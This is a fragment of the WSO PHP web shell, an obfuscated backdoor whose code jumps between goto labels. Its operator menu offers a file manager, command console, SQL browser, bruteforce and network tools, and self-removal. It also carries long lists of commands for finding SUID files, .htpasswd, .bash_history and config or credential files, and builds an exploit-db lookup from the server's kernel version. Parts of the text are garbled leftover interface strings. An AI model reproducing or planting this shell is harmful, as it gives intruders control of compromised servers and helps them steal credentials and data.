", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } goto jZzWZ; OX44o: echo "
\xd
            
\x9		

	\x9	

\xa            

\x9	
"; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo ""; } goto vUNKP; qLbIZ: if (@$_POST["p3"]) { wsoRecursiveGlob($_POST["c"]); } goto uWngZ; jZzWZ: echo "

Search files:
\xd
\x9	\xd
		\x9\xd\xa\x9\x9	\xd\xa			
\xa\x9		\xd\xa	\x9	Text: 
Path: 
Name: 
"; goto awjDW; IHtdM: $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto MrsTM; Cjo7J: $color = "#df5"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "" . "" . "Uname:
User:
Php:
Hdd:
Cwd:" . ($GLOBALS["os"] == "win" ? "
Drives:" : '') . " " . substr(@php_uname(), 0, 120) . " [exploit-db.com]
" . $uid . " ( " . $user . " ) Group: " . $gid . " ( " . $group . " )
" . @phpversion() . " Safe mode: " . ($GLOBALS["safe_mode"] ? "ON" : "OFF") . " [ phpinfo ] Datetime: " . date("Y-m-d H:i:s") . "
" . wsoViewSize($totalSpace) . " Free: " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)
" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " [ home ]
" . $drives . " 
Server IP:
" . @$_SERVER["SERVER_ADDR"] . "
Client IP:
" . $_SERVER["REMOTE_ADDR"] . "
" . "" . $menu . "
"; goto RzURU; M4wyI: $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto wwJNm; yWMQp: $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); goto QAzn_; JIPap: if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } goto hedz2; nmRB7: echo "" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "\xd

\xa
\xa
\xd
\xd
\xd

\xa\xd

\xa\xd
"; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["cwd"]); goto XR0lk; mxXoN: $explink = "http://exploit-db.com/search/?action=search&filter_description="; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("s"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "" . $path[$i] . "/"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["Self remove"] = "SelfRemove"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("/", $GLOBALS["cwd"]); goto MFEdT; CGFSE: if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["cwd"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= " [ " . $k . " ]\xd\xa\x9
\x9\x9
\xa	\x9\xd
	
\xa\x9	
\xa\x9\xd\xa		
\xa		
\x9Change dir:
Read file:
Make dir:{$is_writable}

		Make file:{$is_writable}
Execute:

\xa\x9\x9
\x9	\xd
\x9	\xd
\x9\x9
\x9\x9Upload file:{$is_writable}
File manager

File tools

PHP info

Results

Bruteforce

Sql browser

Console

String conversions

Search files:

Suicide

Change dir:	Read file:
Make dir:{$is_writable}	Make file:{$is_writable}
Execute:	\xa\x9\x9 \x9 \xd \x9 \xd \x9\x9 \x9\x9Upload file:{$is_writable}